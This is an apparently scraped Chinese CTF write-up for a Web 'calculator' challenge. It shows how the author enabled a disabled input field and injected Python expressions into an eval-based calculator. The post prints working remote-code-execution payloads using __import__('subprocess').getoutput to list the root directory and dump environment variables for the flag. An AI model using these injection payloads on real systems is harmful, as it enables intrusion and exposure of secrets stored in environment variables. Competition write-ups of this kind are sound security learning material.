当前位置: 首页 > news >正文

第三届京麒CTF Web

计算器

修改前端的disable属性, 将其删除, 使得可以更改输入框的内容, 变为可控

在这里插入图片描述

输入表达式可以执行计算操作, 大概代码里面是使用了exec或者eval等进行执行, 那么就可以通过构造payload进行rce
不断测试, 可以发现通过这个payload可以rce

__import__('subprocess').getoutput('ls /')

在这里插入图片描述

查看环境变量可以拿到flag

__import__('subprocess').getoutput('env')

在这里插入图片描述

xss的题目还有待复现, 感觉好难 ><

相关文章:

  • MyBatis入门:快速搭建数据库操作框架 + 增删改查(CRUD)
  • Web字体本地化的一种方案
  • 电动式传声器与电容式传声器
  • 【区间dp】-----例题4【凸多边形的划分】
  • 【前端基础】Promise 详解
  • Android Studio 介绍
  • 基于Robust Video Matting 使用Unity 实现无绿幕实时人像抠图
  • 编程日志5.19
  • 人工智能100问☞第33问:什么是计算机视觉?
  • 遥感解译项目Land-Cover-Semantic-Segmentation-PyTorch之三制作训练数据
  • 从无符号长整型数中提取字节
  • 力扣刷题Day 56:岛屿数量(200)
  • 策略模式与责任链模式学习笔记:从入门到理解
  • 如何选择自动化编程平台
  • OpenSSL 签名验证详解:PKCS7* p7、cafile 与 RSA 验签实现
  • 【windwos】文本编辑器Notepad++ 替代品Notepad--
  • 支持向量机(SVM)例题
  • 综合实现案例 LVS keepalived mysql 等
  • 深入解析Spring Boot与Redis集成:高效缓存与性能优化实践
  • 《软件工程》第 3 章 -需求工程概论
  • 专业团队下一句/移动端关键词排名优化
  • 想自己建一个公司网站怎么做/友链交换
  • 免费发布推广的网站有哪些/电商网站分析
  • 网站建设公司的业务规划/b站怎么推广
  • 企业微网站怎么做/淘宝关键词排名优化技巧
  • wordpress 用户导入/南京百度推广优化排名